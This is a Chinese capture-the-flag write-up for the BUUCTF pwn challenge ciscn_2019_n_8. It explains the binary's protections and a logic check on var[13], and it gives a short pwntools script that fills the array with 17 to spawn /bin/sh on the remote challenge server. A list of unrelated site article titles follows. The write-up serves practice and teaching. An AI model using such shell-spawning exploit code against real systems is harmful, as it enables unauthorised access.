[BUUCTF]PWN13——ciscn_2019_n_8

题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8

步骤:
例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化)

nc一下,看看程序大概的执行情况

32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh

双击跟进,ctrl+x查看哪里调用了这个字符串

很简单的一个程序,一开始让我们输入name,之后只要var[13]=17就会调用system(‘/bin/sh’)获取shell
我们只要将var这个数组里全部填上17即可通过判断

EXP

from pwn import*

r=remote('node3.buuoj.cn',26348)
payload=p32(17)*14 r.sendline(payload)
r.interactive()


一道简单的逻辑绕过,感觉跟保护机制没太大关系

最新文章

  1. alias指令:设置命令别名
  2. sql rank()函数
  3. GBDT算法原理深入解析
  4. Sturts2的action不执行任何方法的原因
  5. oracle rac重建控制文件
  6. 修改phpmyadmin文件的最大上传大小
  7. 初涉A*剪枝
  8. js 高级函数 之示例
  9. C#中log4net使用方法(一)
  10. 2014-CVTE网测部分软件技术测试题及答案
  11. 我是如何同时拿到阿里和腾讯offer的
  12. 基于I2C EPPRPM(AT24C02B) + LCD12864实验
  13. hdu 5391 (数论)
  14. Python调用ansible API系列(三)带有callback的执行adhoc和playbook
  15. Linux 编程笔记(三)
  16. JDK动态代理源码解析
  17. Windows bat 学习(初级)
  18. PostgreSQL获取table名,字段名
  19. 敏捷转型中why与how的总结
  20. canvas.drawBitmap(bitmap, src, dst, paint)

热门文章

  1. [hdu6578]Blank
  2. [loj3246]Cave Paintings
  3. 对象池模式(Object Pool Pattern)
  4. JAVA特点及安装卸载
  5. 学军中学csp-noip2020模拟5
  6. C/C++内存几大分区和存储空间的布局
  7. Hosts文件详解
  8. LightningChart JS v.3.3.0全新版本现已发布!
  9. Apache2配置文件解读
  10. 利用extern共享全局变量